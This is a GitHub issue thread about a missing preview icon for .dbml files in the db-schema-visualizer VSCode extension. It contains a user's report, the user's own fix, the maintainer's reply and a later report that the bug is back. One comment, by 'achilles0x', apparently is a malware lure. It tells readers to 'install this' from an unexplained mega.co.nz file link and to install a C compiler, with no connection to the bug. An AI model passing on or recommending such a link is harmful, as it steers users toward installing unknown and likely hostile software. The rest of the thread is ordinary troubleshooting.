### ISSUE TITLE
Preview icon in the top right-hand corner of the editor's title bar not displayed

### ISSUE THREAD

**Issue by ce-paiqo** [BOCOVO/db-schema-visualizer#64]
**Describe the bug**
The installation of the extension in VSCode worked fine. However, when I open a `.dbml` file, the preview icon in the top right-hand corner of the editor's title bar is not being displayed and I am therefore not able to visualize the file, so this icon is missing:

![image](https://github.com/user-attachments/assets/d299ae41-654d-44ab-bf52-a1656b58e550)

Do you have any idea how to fix this?
Thank you very much!

**Comment by achilles0x** [comment]
install this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ce-paiqo** [comment]
I actually found the answer in one of the closed issues myself -> installing the vscode-dbml extension seems to resolve the issue.

**Comment by BOCOVO** [comment]
Hello @ce-paiqo !

Thank you for reporting this. 
The dependency has been fixed, and the release is done.

**Comment by OpenSource03** [comment]
Hi @BOCOVO, I'm experiencing same issue on latest release... Could you check again?
